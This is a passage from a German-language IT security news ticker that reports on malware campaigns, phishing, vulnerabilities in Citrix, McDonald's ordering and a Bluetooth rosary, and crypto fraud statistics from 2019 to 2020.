Im Vergleich zum Vorjahr stieg die Anzahl Cyberbedrohungen für Macs um 400 Prozent, wie das Unternehmen schreibt. Dieser Zuwachs könne jedoch auch auf die gestiegene Anzahl von Nutzern zurückzuführen sein, die Malwarebytes auf Macs einsetzen würden, schreibt der Sicherheitsanbieter. 

Um diese Verzerrung der Statistik zu eliminieren, prüfte Malwarebytes die Anzahl Cyberbedrohungen pro Endpoint für Macs und Windows-PCs. Das Ergebnis: 2019 registrierte die IT-Security-Firma durchschnittlich 5,8 Bedrohungen pro Endpoint auf Windows-Rechnern. Und für Macs? Hier zählte Malwarebytes fast doppelt so viele Bedrohungen pro Endpoint: Im Schnitt waren es 11. 

"Wenn uns die Bedrohungslandschaft von 2019 etwas zeigt, dann, dass es an der Zeit ist, die Cybersecurity von Macs sehr genau zu prüfen und endlich ernst zu nehmen", schreibt Malwarebytes in dem Bericht.

27.02.2020 - 15:46 Uhr

Auch Atomwaffen können Sicherheitslücken haben

Was nicht smart ist, kann im Nachhinein smart gemacht werden – das gilt auch für Atomwaffen. Die Wasserstoffbombe B61, die erstmals 1968 produziert wurde, war ursprünglich eine frei fallende Fliegerbombe. Also eine Bombe, die aus einem Flugzeug abgeworfen wird und die ihr Ziel ohne Lenk- oder Antriebssystem findet – lediglich die Schwerkraft bringt sie dahin.

Mehr als 3000 Bomben dieses Typs wurden gebaut – rund 300 sollen noch im aktiven Bestand der Streitkräfte der Vereinigten Staaten sein. Bereits 2012 erhielt der US-amerikanische Konzern Boeing den Auftrag, vier der B61-Varianten mit einem Navigationsmodul inklusive Steuerflächen aufzurüsten. Ende 2018 folgte der offizielle Startschuss für den Bau der Lenksysteme im Rahmen erweiterter Verträge, wie Heise.de berichtet. Für den ersten Auftrag in 2012 erhielt Boeing 178 Millionen US-Dollar.

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

 

Mit der smarten Aufrüstung machte Boeing die Atomwaffe jedoch auch verwundbar für die Gefahren des digitalen Zeitalters. Das neu entwickelte Lenksystem weist eine Sicherheitslücke auf, wie ein Prüfbericht des Verteidigungsministeriums der Vereinigten Staaten zeigt. Es liege jedoch im Bereich des Machbaren, die Lücke ohne ein grösseres Investment an Zeit und Geld zu schliessen.

Im Laufe der bisherigen Flugtests hätten sich jedoch keine Fehler bemerkbar gemacht, welche die Einsatzfähigkeit beschränken würden, heisst es im Bericht. Der Bericht rät aber trotzdem dazu, die Sicherheitslücke in den Atomwaffen möglichst zeitnah zu schliessen.

18.02.2020 - 15:43 Uhr

Dreiste Hacker infizieren mit Coronavirus auch Rechner

Haben Cyberkriminelle Moralvorstellungen und Skrupel? Vielleicht. Es mag zwar durchaus sein, dass es gewisse Grenzen gibt, die sie nicht überschreiten. Die Angst vor Epidemien auszunutzen, gehört jedoch nicht dazu. Dies zeigt eine aktuelle Phishing-Kampagne mit einer "besonders geschmacklosen Aufmachung", wie der britische IT-Security-Anbieter Sophos mitteilt. 

Die betrügerischen E-Mails nutzen den Namen und das Logo der Weltgesundheitsorganisation WHO. Angeblich könne der Empfänger über den Link in der E-Mail Sicherheitshinweise rund um das Coronavirus herunterladen. Ein sehr aktuelles Thema, schliesslich sorgte das Coronavirus im Vorfeld der ISE 2020 für einigen Wirbel. Der MWC 2020 wurde sogar komplett abgesagt. 

Wer auf den Link klingt, fängt sich jedoch etwas anderes ein, wie Sophos schreibt. Zwar sehe die Seite durchaus aus wie das Original der WHO. Was vor allem auf mobilen Geräten nicht auffällt, ist, dass die URL zu einer "kompromittierten Musikseite mit seltsamem Namen führt, die auf den ersten Blick keinerlei Verbindungen zu irgendeiner bekannten Gesundheitsorganisation aufweist", heisst es in der Mitteilung. Der grosse Unterschied zur Homepage der WHO ist jedoch, dass bei der betrügerischen Version ein Pop-up erscheint, das die Opfer auffordert, ihre persönlichen Daten einzugeben. 

"Cyberkriminelle nutzen jede Gelegenheit, um neue Opfer zu finden, deren Daten sie stehlen oder deren Smartphones und Rechner sie übernehmen und beispielsweise mit Ransomware infizieren können", sagt Michael Veit, Sicherheitsexperte bei Sophos. 
Veit stellte 8 Sicherheitsmassnahmen zusammen, um sich vor Infektionen durch Phishing-Attacken zu schützen:

  1. Ruhe bewahren.
  2. Nicht vom Namen beeindrucken lassen.
  3. REchtschreibg. und Gramatick.
  4. Malware-Schutz für Smartphone und Tablets
  5. Keine Daten in ein Formular eingeben, nach denen eine Webseite nie fragen würde.
  6. Falls das Passwort in falsche Hände kam – das Passwort ändern.
  7. Saubere Passwort-Hygiene
  8. Zwei-Faktor-Authentifizierung

23.01.2020 - 12:19 Uhr

Gute Hamburger Hacker erbeuten Hamburger mit Mac-Hack

Hacker haben es immer nur auf Geld oder Aktivismus abgesehen? Nein, manchmal geht es auch um Hamburger! Etwas verwirrender wird diese Geschichte dadurch, dass die Hacker, um die es hier geht, selbst Hamburger sind. 

Wie das Magazin "Vice" berichtet, entdeckten die Entwickler Lenny Bakkalian, David Albert und Mats Tesch zwei Sicherheitslücken. Diese machten das Bestellsystem des Fastfood-Anbieters McDonald’s verwundbar. Wer die erste Lücke ausnützt, kann beliebig viele Gutscheine für Gratisgetränke generieren.

Eigentlich müsste man hierfür jeweils eine Onlineumfrage beantworten. Die Umfragewebsite schickt die Info einem McDonald’s-Server und dieser antwortet mit einem Gutscheincode. Die Info, welche die Website abschickt, ist jedoch stets dieselbe. Darum konnten die Entwickler diesen Schritt auch mit einem Tool automatisieren.

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

Die zweite Lücke baut auf die erste auf, ist aber deutlich gravierender. So könne man im Bestellsystem der Funktion, die den Preis des Getränks auf 0,00 Euro setzt, einfach weitere Produkte unterschieben. Die drei Entwickler haben die Schwachstellen McDonald’s gemeldet.

In Absprache mit einer Filialleiterin demonstrierten sie auch, wie der Trick funktioniert: 15 Burger im Wert von rund 106 Euro waren in der Bestellung – unterm Strich stand jedoch 0 Euro. Mitte Dezember schloss der Fastfood-Anbieter die Schwachstellen.

22.01.2020 - 08:39 Uhr

Update: Citrix veröffentlicht ersten Patch für "Shitrix"

Citrix hat auf die Sicherheitslücken im Citrix Application Delivery Controller (ADC), dem Gateway und der SD-WAN WANOP Appliance reagiert. Für die ADC-Versionen 11.1 und 12.0 stehen ab sofort Sicherheitspatches zum Download bereit, wie das Softwareunternehmen in seinem Blog mitteilt.

Citrix bittet seine Kunden dringend, die neuen Updates zu installieren. Weitere Versionspatches und Fehlerbehebungen sollen am 24. Januar erscheinen.

(osc)

15.01.2020 - 12:01 Uhr

Shitrix: Behörden stehen still, während Hacker aktiv werden

Mitte Dezember hat Citrix auf eine kritische Schwachstelle hingewiesen. Die Sicherheitslücke steckt im Application Delivery Controller (ADC) und dem Citrix Gateway des US-amerikanischen Virtualisierungsspezialisten, wie dieser damals selbst mitteilte. Mehr Infos von Citrix sowie die Liste der betroffenen Netscaler-Produkte finden sich hier.

Es handelt sich um eine sogenannte Remote-Code-Execution-Lücke. Das heisst, ein Angreifer, der die Schwachstelle ausnutzt, könnte willkürliche Befehle auf der infizierten Maschine ausführen.

Zusammen mit der Warnung veröffentlichte Citrix auch eine Anleitung, wie man die Angriffe blockieren kann, während das Unternehmen noch an einer neuen Firmware arbeitet. Diese ist hier zu finden.

 

Hacker nutzen Schwachstelle unterdessen aus

Und was geschah seitdem? Nicht viel. Gemäss einem Bericht von SRF seien in der Schweiz rund 900 Server noch immer verwundbar. SRF Data ordnete diese Server über 200 grossen Schweizer Unternehmen und Institutionen zu. Darunter Finanzinstitute, multinationale Konzerne, Detailhändler, Medienhäuser, Krankenhäuser, Gemeinden, öffentliche Werke und ÖV-Betriebe, sowie mehrere Dutzend KMUs, wie SRF schreibt.

Auch in der EU sieht die Lage nicht anders aus, wie Golem.de berichtet. Die EU habe "zahlreiche verwundbare Systeme am Netz". Dazu zählten etwa das europäische Patentbüro, die Arzneimittelagentur EMA und die europäische Polizeiakademie.

Die Gegenseite hingegen war deutlich aktiver. Mittlerweile hat die Sicherheitslücke den Namen "Shitrix" erhalten und wird gemäss Golem bereits aktiv ausgenutzt. Auf Github etwa sind bereits fixfertige Exploit-Kits für die Schwachstelle aufgetaucht.

20.12.2019 - 13:30 Uhr

Kantonspolizei Zürich eliminiert 450 betrügerische Webshops innert 24 Stunden

Die Abteilung Cybercrime der Kantonspolizei Zürich hat 450 betrügerische Onlineshops vom Netz genommen. Die Webshops wurden innert 24 Stunden identifiziert und gesperrt, wie es in einer Medienmitteilung heisst. Hierfür arbeitete die Strafverfolgung mit den Schweizer Registrierungsstellen für .ch-Domains zusammen.

Derartige Webshops würden teure Marken- und Elektronikartikel zu sehr günstigen Preisen anbieten. Aber nach dem Kauf gefälschte Waren oder gar nichts liefern. Seit Anfang 2018 sperrte die Kantonspolizei Zürich nach eigenen Angaben bereits 6500 solcher Onlineshops. Insbesondere in der Vorweihnachtszeit nehme der Schaden zu. 

 

 

Die Kantonspolizei Zürich gibt Onlineshopper zudem folgende Ratschläge mit auf dem Weg. Nutzer sollten:

  • die Warnhinweise ihres Browsers beachten,
  • prüfen, ob die Seite ein Impressum hat,
  • und den Domainnamen mit dem Seiteninhalt vergleichen.

Betrügerische Onlineshops hätten in den meisten Fällen einen unpassenden Domainnamen. Die Polizei rät zudem, unbekannte und verdächtige Webshops zu melden.

Mehr Informationen von der Kantonspolizei Zürich zu betrügerischen Webshops gibt es hier.

 

18.12.2019 - 12:20 Uhr

Nicht-existenter Print-Monitor schnüffelt nach Daten

Die Sicherheitsexperten von Eset haben einen ungewöhnlich fortschrittlichen Schädling entdeckt, wie das slowakische IT-Security-Unternehmen mitteilt. Die ersten Schritte macht das Schadprogramm – Eset nennt es Deprimon – im Arbeitsspeicher, nicht auf der Festplatte. Hierfür nutzt es eine Form von DLL-Injection namens "Reflective DLL Loading". 

Das Problem mit derartigen dateilosen Angriffen ist die mangelnde Beständigkeit: Ein Neustart löscht den Arbeitsspeicher und somit auch die Malware. Deprimon umgeht dies, indem sich das Schadprogramm als neuen lokalen Port-Monitor registriert. Dabei nutzt es die Bezeichnung "Default Print Monitor" – daher auch der Name der Malware "De-Pri-Mon". Laut den Sicherheitsexperten ist Deprimon die erste Malware, die so vorgeht. 

Die Malware wurde mit viel Sorgfalt entwickelt. Das Resultat: ein leistungsstarkes und flexibles Tool, das weitere Bedrohungen herunterladen und ausführen kann. Währenddem sammelt sie zudem noch Daten über das infizierte System und dessen Nutzer. Um die Kommunikation mit dem Command-and-Control-Server zu schützen, nutzt Deprimon eine AES-Verschlüsselung mit drei verschiedenen 256-Bit-Schlüsseln. 

Deprimon ist mindestens seit März 2017 aktiv. Der Schädling wurde in Dutzenden Rechnern im Nahen Osten sowie in einem Privatunternehmen mit Sitz in Mitteleuropa entdeckt. Wie die Malware auf die Rechner kam, ist noch nicht bekannt. Gewisse Rechner wurden jedoch zeitnahe Infektionen von Deprimon und der Malware Coloredlambert registriert. Coloredlambert wird in der Regel mit der Cyberspionage-Gruppe Lamberts in Verbindung gebracht. 

Den ausführlichen Bericht von Eset kann man online lesen.

28.11.2019 - 14:58 Uhr

Kryptodelikte gehen zurück – aber zerschlagen zuerst noch den Vorjahresrekord

Im dritten Quartal 2019 ist der Schaden, der durch Kryptowährungsdelikte entstand, eigentlich zurück gegangen. Laut einer Studie von Ciphertrace war der Schaden sogar auf dem Tiefstwert der vergangenen Jahre. 

Die gesamte Schadenssumme im dritten Quartal betrug 15,5 Millionen US-Dollar. Davon wurden 6,5 Millionen Dollar durch Cyberkriminelle gestohlen. Die übrigen 9 Millionen Dollar sind gemäss der Studie auf Exit-Scams und Ponzi-Systeme zurück zu führen.

Warum ist dieser Rückgang allein noch kein Grund zur Freude? In den ersten neun Monaten des laufenden Jahres wurden insgesamt 4,4 Milliarden US-Dollar mit Kryptowährungsdelikten ergaunert. Bereits jetzt liegt die Schadenssumme 150 Prozent über dem Vergleichswert des gesamten Jahres 2018, wie die Studie zeigt.

 

3 Milliarden in zwei Exit-Scams

Zu dem Rekordwert im laufenden Jahr trugen laut der Studie vor allem zwei Exit-Scams bei: QuadrigaCX und Plustoken.

Gerald Cotten, der CEO der kanadischen Kryptowährungsbörse QuadrigaCX, verstarb im Dezember 2018 unter mysteriösen und widersprüchlichen Umständen in Indien. Er besass jedoch als einziger das Passwort für die Offlinespeicher, in denen 192 Millionen Dollar von über 100'000 Kunden verwahrt wurden. 

Im März 2019 knackte EY mit richterlicher Verfügung den Laptop des verstorbenen CEOs. Ihre Untersuchung zeigte, dass die Konten rund acht Monate vor dem Tod Cottens geplündert wurden. Zudem war die Buchhaltung des Unternehmens mangelhaft und voller Lücken.

Plustoken könnte derweil der bisher grösste Exit-Scam sein. Der Schaden soll etwa 2,9 Milliarden Dollar betragen. Die chinesische Polizei deckte das angebliche Ponzi-System rund um den südkoreanischen Anbieter Ende des zweiten Quartals auf. Die Einzelheiten sind aber noch immer nicht klar.

 

Hohe Dunkelziffer und mehr Betrugsdelikte

Eine echte Erklärung dafür, wieso die Kryptowährungsdelikte im dritten Quartal zurückgingen, hat Ciphertrace nicht. Laut der Studie hätten die beiden Exit-Scams aber sicher dazu beigetragen, die Statistiken zu verzerren. Ferner könnte der Rückgang mit der zunehmden staatlichen Regulierung der Kryptobranche zusammenhängen. 

"Aber auch ohne die beiden grössten Fälle sehen wir sehr viele Millionendelikte", sagt Dave Jevans, CEO von Ciphertrace gegenüber Reuters. Gemäss ihm steige die Kriminalität in der Kryptoszene relativ konstant. "Und wir gehen nicht davon aus, dass sich dies über Nacht ändern wird."

Delikte mit einem Schaden von weniger als 5 Millionen Dollar werden gemäss dem CEO oft gar nicht gemeldet. Das Unternehmen sehe jedoch eine klare Verschiebung in der Art der Verbrechen: Statt Diebstahl mehren sich nun die Fälle von Betrug: Kryptokriminelle sind zunehmend geduldig und warten, um eine fettere Beute zu erzielen.

Die vollständige Studie von Ciphertrace können Interessierte hier lesen.

28.11.2019 - 14:34 Uhr

Trojaner Trickbot testet taufrische Tricks

Das Schadprogramm Trickbot entwickelt sich kontinuierlich weiter. Mittlerweile ist die Malware deutlich über ihre ursprüngliche Programmierung als E-Banking-Trojaner hinausgewachsen. So kann Trickbot etwa auch Passwörter stehlen, wie "Bleepingcomputer" berichtet. Ein entsprechendes Modul erhielt das Schadprogramm zwar bereits vor einem Jahr. 

Anfang November 2019 entdeckte Unit 42, die Sicherheitsexperten von Palo Alto Networks, dass Trickbot einen neuen Trick gelernt hat: Die Malware kann jetzt OpenSSH-Privatschlüssel sowie Passwörter und Konfigurationsdateien von OpenVPN stehlen. Noch exfiltriert die Malware jedoch keine Daten. Gemäss den Sicherheitsexperten sei dies ein Hinweis darauf, dass die Entwickler hinter Trickbot die neue Funktion lediglich testen und noch nicht vollständig implementiert haben. 

Harmlos ist das Schadprogramm trotzdem nicht. Im Juli 2017 etwa erlernte Trickbot die Fähigkeit, sich selbst weiterzuverbreiten. Anfang 2019 stieg die Malware in das Geschäft mit Access-as-a-Service ein: Gegen Bezahlung können Dritte nun auf bereits infizierte Systeme zugreifen. Im Juli erhielt die Malware weitere Upgrades. Seitdem kann der einstige Banking-Trojaner den Windows Defender umgehen und Browser-Cookies stehlen.

Auch in der Schweiz treibt Trickbot sein Unwesen. Das Swiss Government Computer Emergency Response Team (GovCERT) publizierte darum Ende September eine ausführliche Analyse der Malware. Diese kann hier als PDF heruntergeladen werden.

18.11.2019 - 14:23 Uhr

Spyware statt Cryptominer: Diese Cyber-Schädlinge bedrohen die Schweizer IT-Landschaft

Der israelische Cybersecurity-Anbieter Check Point hat die "Most Wanted Malware"-Liste für den vergangenen Oktober veröffentlicht. Erstmals seit fast zwei Jahren führen Cryptominer die Liste nicht an, wie das Unternehmen mitteilt.

Crytpominer sind in der Regel Javaskripte, die sich leicht in Websites und Applikationen einbauen und verbergen lassen. So könnte auch in einer Werbeanzeige auf einer Homepage ein Cryptominer versteckt sein. Die Schädlinge nutzen die Rechenleistung ihrer Opfer, um damit nach Kryptowährungen wie Bitcoin zu schürfen. Dem Opfer fällt dies oft gar nicht auf.

Seit dem Höhepunkt Anfang 2018 nahm die Nutzung von Cryptominern stetig ab. In den Monaten Januar und Februar des vergangenen Jahres war jedes zweite Unternehmen weltweit von diesen Schädlingen betroffen. Januar 2019 war dieser Wert bereits auf 30 Prozent gesunken. Im vergangenen Oktober waren es noch 11 Prozent weltweit. 

Spyware und Emotet auf dem Vormarsch
Check Point stellte zugleich einen deutlich Anstieg bei der Nutzung von Spyware statt. Mit Lokibot, Hawkeye und Formbook schafften es gleich drei Schädlinge auf die Liste, die es auf Zugangsdaten abgesehen haben.

Der neue Platzhirsch ist allerdings Emotet. Mehr als 14 Prozent der Unternehmen weltweit seien im Oktober von dieser Malware betroffen gewesen, schreibt Check Point. In der Schweiz waren es sogar fast 16 Prozent. Die Malware hatte sich im September nach einer mehrmonatigen Pause zurückgemeldet.

Emotet sei eine ernsthafte Bedrohung, zitiert die Mitteilung Maya Horowitz, Director Threat Intelligence & Research bei Check Point. Ein sehr fortschrittlicher modularer Trojaner, der ein Botnetz kreiert, um andere Arten von Malware zu verbreiten - darunter auch die Ryuk-Ransomware. 

Die Top-Malware in der Schweiz im Oktober:

  1. Emotet (Trojaner – 15,9 Prozent der Schweizer Firmen betroffen)
  2. Trickbot (E-Banking-Trojaner – 5,3 der Schweizer Firmen betroffen)
  3. Ramnit (Wurm – 5,1 der Schweizer Firmen betroffen)
  4. AgentTesla (RAT – 4,9 der Schweizer Firmen betroffen)
  5. Lokibot (Info Stealer – 4,9 Prozent der Schweizer Firmen)
  6. Hawkeye (Info Stealer – 4,9 Prozent der Schweizer Firmen)
  7. Formbook (Info Stealer – 3,3 Prozent der Schweizer Firmen)
  8. Cryptoloot  (Cryptominer – 3,1 Prozent der Schweizer Firmen)
  9. Jsecoin (Cryptominer – 2,9 Prozent der Schweizer Firmen)
  10. XMRig (Cryptominer – 2,6 Prozent der Schweizer Firmen)
     

18.11.2019 - 12:03 Uhr

Zum Nachschlagen:

Das IT-Security-Glossar verschafft einen schnellen Überblick über die gängigsten Begriffe rund um Cybercrime und IT-Security - ohne Anspruch auf Vollständigkeit.

Das Who’s who der Malware gibt einen schnellen Überblick darüber, was hinter den Namen der einzelnen Schadprogrammen steckt. Mehr auf www.it-markt.ch/MalwareABC.

18.11.2019 - 11:32 Uhr

Schürfender Krypto-Wurm verbuddelt sich in Docker-Container

Unit 42, die Cybersecurity-Spezialisten von Palo Alto Networks, haben einen Wurm mit einer Vorliebe für Container entdeckt. Der Wurm wühlte sich bereits durch über 2000 Docker-Hosts, wie das Unternehmen mitteilt. Gemäss Unit 42 ist dies der erste Wurm, der sich über die Docker-Engine verbreitet. Die meisten handelsüblichen Sicherheitslösungen prüfen nicht, was innerhalb eines Containers passiert. Dies macht es schwierig, derartige Bedrohungen zu entdecken.

Der Wurm wurde entwickelt, um nach der Kryptowährung Monero zu schürfen. Von Zeit zu Zeit nimmt der Wurm auch mit seinem Command-and-Control-Server Kontakt auf. So fragt der Wurm einerseits nach neuen Opfern, um sich weiter auszubreiten. Andererseits lädt er auch Skripts herunter, um sich selbst mit neuen Fähigkeiten auszustatten. Die Sicherheitsexperten warnen davor, dass der Wurm sich so leicht zur Ransomware mausern könnte, um noch mehr Schaden anzurichten.Die Bedrohung, die von solchen Würmern ausgeht, dürfe daher nicht unterschätzt werden. 

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

 

Rund ein Drittel der Zeit ist der Wurm jedoch inaktiv. Die einzelnen Schürfepisoden dauern zudem nur 250 Sekunden. Die Sicherheitsforscher von Unit 42 tauften den Wurm daher "Graboid" – nach dem Kultfilm "Tremors" mit Kevin Bacon und Fred Ward. In dem Film aus dem Jahre 1990 wird die kleine Wüstenstadt Perfection von gigantischen, gefrässigen Sandwürmern terrorisiert. Wie das Schadprogramm bewegen sich auch die Graboids im Film in kurzen Schüben mit hoher Geschwindigkeit, sind aber insgesamt relativ unfähig, wie Unit 42 schreibt. 

In Zusammenarbeit mit Unit 42 habe das Docker-Team die schädlichen Docker-Images bereits entfernt. Den vollständigen Bericht – inklusiven allen IoCs (indicators of Compromise) können Interessierte hier finden. 

25.10.2019 - 12:21 Uhr

Falsche Bluemail-App ködert Swisscom-Kunden

Diese Woche hat eine falsche Bluewin-App versucht, Swisscom-Kunden zu ködern. Das Computer Security Incident Response Team (CSIRT) des Telkos hatte auf Twitter vor der Fake-App gewarnt. Diese war unter dem Namen "Email_Bluewin" im offiziellen Google Play Store erhältlich.

 

 

Wie Das CSIRT in einem weiteren Tweet mitteilt, wurde die App bereits wieder entfernt. Derzeit sind auch keine weiteren Applikationen des Entwicklers im Store zu finden. 

Beim herunterladen von Applikationen lohnt es sich, einen Blick auf den Namen des Entwicklers zu werfen. In diesem Fall war der Entwickler nämlich unter dem Benutzernamen "Piscatelli" angemeldet. Ein klares Anzeichen dafür, dass die App nicht von Swisscom kommt.

25.10.2019 - 12:17 Uhr

Exorzismus misslingt – Software-Dämonen bleiben in Bluetooth-Rosenkranz 

Wem gewöhnliches Beten zu analog ist, kann neuerdings auf ein Gadget namens eRosary zurückgreifen. Der Bluetooth-Rosenkranz ist für etwas mehr als 100 US-Dollar erhältlich und besteht aus einem Armband, bestückt mit Kreuz und Metallkugeln. Macht der Nutzer mit dem eRosary das Kreuzzeichen, aktiviert er die Begleit-App auf seinem Smartphone. Diese schlägt etwa Gebete vor oder erinnert den Nutzer daran, wann es wiedermal Zeit für ein Gespräch mit Gott ist, wie "The Register" berichtet. 

Bei der Digitalisierung des Rosenkranzgebets wurde jedoch ein Bisschen gepfuscht, wie es im Bericht heisst. Wie der britische IT-Security-Anbieter Fidus Information Security gegenüber dem Newsportal sagt, habe wohl ein Entwickler einfach eine bestehende Fitness-Band-App genommen und etwas angepasst. An Cybersecurity dachte dabei niemand. Die Analysten von Findus brauchten daher nur 10 Minuten, um die ersten seriösen Sicherheitsmängel zu finden. 

Anfällig für Brute-Force-Attacken

Um Gadget und App zu nutzen, muss man einen Account erstellen. Dieser Account wird mit einer vierstelligen PIN geschützt. Allerdings gibt es keine Beschränkung für falsche Anmeldeversuche. Dies macht die App sehr anfällig für Brute-Force-Attacken. Schliesslich gibt es nur 10 000 mögliche Kombinationen. Zudem kann man über eine Schnittstelle den PIN eines Accounts abfragen, wenn man die dazugehörige E-Mail-Adresse abschickt. 

Zwar speichert die App keine Zahlungsinformationen. Wer einen Account hackt, hat aber Zugriff auf Namen und die physische Beschreibung der Nutzer. In Ländern, in denen Katholiken geächtet werden, könnte dies bereits ein seriöses Problem darstellen, wie "The Register" schreibt.

Die Entwickler versprachen, die Lücken unverzüglich zu schliessen. Der Exorzismus der Software-Dämonen gelang jedoch nicht komplett. Zwar seien die API-Probleme nun behoben, heisst es vonseiten Fidus. Allerdings gebe es noch immer keinen Schutz vor Brute-Force-Attacken. Wer seine privaten Gespräche mit Gott also privat halten will, sollte wohl bei Rosenkränzen aus gewöhnlicheren Materialien bleiben.

Den vollständigen Bericht von Fidus Information Security gibt’s hier.

25.10.2019 - 12:14 Uhr

Joker meldet Opfer für Premium-Abos an

Sicherheitsforscher der dänischen CSIS Security Group haben einen Android-Trojaner gefunden und diesen "Joker" getauft. Der Name wurde einer der C&C-Domainnamen entlehnt. Das Schadprogramm tauchte in 24 Apps im Google-Play-Store auf und wurde gemäss dem Sicherheitsanbieter über 472 000 Mal heruntergeladen. Die Malware ist zwar nur in 37 ausgewählten Ländern aktiv – darunter ist aber auch die Schweiz. 

Die Malware lädt nach der Installation eine zweite Stufe herunter. Diese sammelt Informationen zum infizierten Gerät sowie die Kontaktdaten und Textnachrichten auf dem Smartphone. Joker sammelt diese Infos allerdings mit einer bestimmten Absicht: Das Schadprogramm simuliert Benutzerinteraktionen auf Werbeseiten. Einerseits generiert es Klicks auf Werbeanzeigen; andererseits meldet es das Opfer auch für Premium-Service-Abonnements an. Hierfür nutzt das Schadprogramm den SMS-Zugriff, um die Anmelde-Codes zu lesen. Ferner verfügt Joker auch über verschiedene Techniken, um Analysen zu erschweren. 

Google hat sämtliche infizierten Apps bereits aus dem Play Store entfernt – noch ehe die Sicherheitsforscher den Konzern über ihren Befund informieren konnten. Gemäss der CSIS Group zeige dies, dass die inhärenten Schutzmassnahmen im Google Play Store funktionieren und schädliche Apps entfernen, wenn sie sich einschleichen. 

Die detaillierte Analyse der Joker-Malware ist auf der Website der CSIS Group zu finden.
 

11.10.2019 - 10:10 Uhr

Handy-Malware nistet sich in SIM-Karte ein

Seit zwei Jahren schon soll eine unsichtbare Bedrohung Mobiltelefone unsicher machen. Das teilte der irische Mobile-Security-Spezialist Adaptivemobile mit. Das Unternehmen warnt vor einer Spyware namens Simjacker. Diese gelangt über präparierte SMS-Nachrichten auf das Handy der Opfer. Die SMS beinhaltet mehrere Sim-Toolkit-Befehle (STK), die auf der SIM-Karte ausgeführt werden. Dort nistet sich dann die Spyware ein. 

Dies funktioniert jedoch nur mit SIM-Karten, die mit dem S@T-Browser bestückt sind. Dabei handelt es sich um eine obskure, veraltete Software. Ursprünglich war diese dafür entwickelt worden, um etwa den Kontostand über die SIM-Karte abfragen zu können. Mittlerweile übernehmen andere Technologien diese Funktionen. 

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

 

Die Spezifikationen seien daher seit 2009 nicht mehr aktualisiert worden, schreibt Adaptivemobile. Der S@T-Browser wurde jedoch nicht entfernt, sondern geisterte weiterhin im Hintergrund auf SIM-Karten herum – dasselbe Schicksal, das so manch eine Legacy-Technologie erleidet. 

Eine Milliarde Personen betroffen

Stand heute seien die SIM-Karten in rund 30 Ländern mit insgesamt mehr als einer Milliarde Einwohnern betroffen. Ist die SIM-Karte infiziert, kann die Spyware anschliessend den Standort, die IMEI-Seriennummer des Geräts und die Rufnummer des Handys herausfinden. Die gestohlenen Informationen sendet Simjacker per SMS an den Angreifer zurück. 

Das Opfer bekomme von alldem nichts mit, schreibt Adaptivemobile. Er bemerke weder die SMS, die ankommen und verschickt werden noch die Infektion auf der SIM-Karte.

Vermutlich könne das Schadprogramm über STK-Befehle noch mehr Schaden anrichten. In Tests gelang es Adaptivemobile etwa auch, das Mobiltelefon in eine Wanze zu verwandeln oder eine gebührenpflichtige Nummer anzurufen. Dies gehe jedoch nicht unbemerkt, sondern nur mit einer Bestätigung des Opfers.

Der gesamte Report von Adaptivemobile über Simjacker ist hier nachzulesen.

 

03.10.2019 - 11:02 Uhr

Cyberkriminelle plündern Guthaben von Digitec-Galaxus-Kunden

"Sehr geehrter Kunde. Wir haben festgestellt, dass Sie mit hoher Wahrscheinlichkeit Opfer einer Phishing-Attacke wurden und sich deshalb Unbefugte Zugriff auf Ihr Digitec- beziehungsweise Galaxus-Konto verschaffen konnten." 

Diese Zeilen mussten wohl etliche Kunden von Digitec-Galaxus lesen. Der Schweizer Onlinehändler war das Ziel eines grossangelegten Cyberangriffs, wie SRF berichtet. Mehrere 100'000 Konten waren betroffen – bei 40 waren die Angreifer erfolgreich. Die Attacke kam wohl aus dem Ausland, wie Mediensprecher Alex Hämmerli gegenüber SRF sagt. 

Die Angreifer nutzten vermutlich eine im Darknet gekaufte Liste mit Zugangsdaten. Derartige Listen kommen zustande, wenn Unternehmen selbst gehackt werden, oder wenn die Kunden von Unternehmen auf Phishing-E-Mails hereinfallen. Die betroffenen Passwörter hat der Onlinehändler bereits zurückgesetzt. 

Für 3200 Franken Softwarelizenzen gekauft

Die Cyberkriminellen plünderten Gutscheine und Guthaben auf den 40 Konten. Mit dem Geld kauften sie anschliessend Softwarelizenzen. Der Gesamtschaden belaufe sich auf 3200 Franken und werde vom Unternehmen übernommen, heisst es im Bericht.

Warum Softwarelizenzen? Gemäss Hämmerli lassen sich diese im Internet schnell weiterverkaufen. Produkte, die man sich erst noch schicken lassen muss, seien daher nur selten Ziel solcher Attacken.

"Solche Angriffe passieren", sagt Hämmerli. "Das ist Teil unseres Geschäfts und das wird sicher auch in Zukunft wieder passieren." Daher arbeite die IT-Abteilung stetig daran, neue Hürden für Angreifer einzubauen. So könne man etwa nur noch eine beschränkte Anzahl Softwarelizenzen zugleich kaufen. Zudem bietet Digitec-Galaxus auch eine Zwei-Faktor-Authentifizierung an.
 

03.10.2019 - 10:59 Uhr

Die sechs überraschendsten Cyberangriffsvektoren

Anti-Virus-Lösung auf dem PC? Selbstverständlich! Anti-Virus-Lösung auf dem Smartphone? Auch keine Seltenheit mehr. Und Anti-Virus-Lösung auf der Computermaus? ...

Die schlimmsten Schwachstellen sind nicht die unauffälligen Sicherheitslücken. Es sind die Lücken in den unauffälligen Geräten. Solche, die man im Netzwerk vergisst. Und aufgrund des Trends hin zu mehr smarten Geräten – im Büro wie auch im Alltag – nimmt ihre Anzahl stetig zu. Daher ist es heute auch nicht mehr unüblich, wenn sogar eine Glühbirne in einem Haushalt über ein eigenes WLAN-Modul verfügt. Dies macht sie aber nicht nur smart, sondern auch zu einem potenziellen Angriffsvektor für Cyberkriminelle. 

Der französische IT-Security-Unternehmen Stormshield – das zur "Airbus Defence and Space"-Gruppe gehört – erstellte daher eine Liste mit den sechs häufigsten, überraschendsten Einstiegspunkten für Cyberattacken.

Auf der Liste findet sich neben der Computermaus, dem Faxgerät und dem Babyphone auch das Aquariumthermometer. Stormshield verweist dabei auf einen Fall aus dem Jahr 2017, bei dem Hacker über die Thermometer in den Aquarien eines nordamerikanischen Casinos in das Netzwerk eindrangen. Im Netz drin, suchten die Hacker nach weiteren Schwachstellen und Daten, die sie stehlen könnten.

Die komplette Liste von Stormshield:

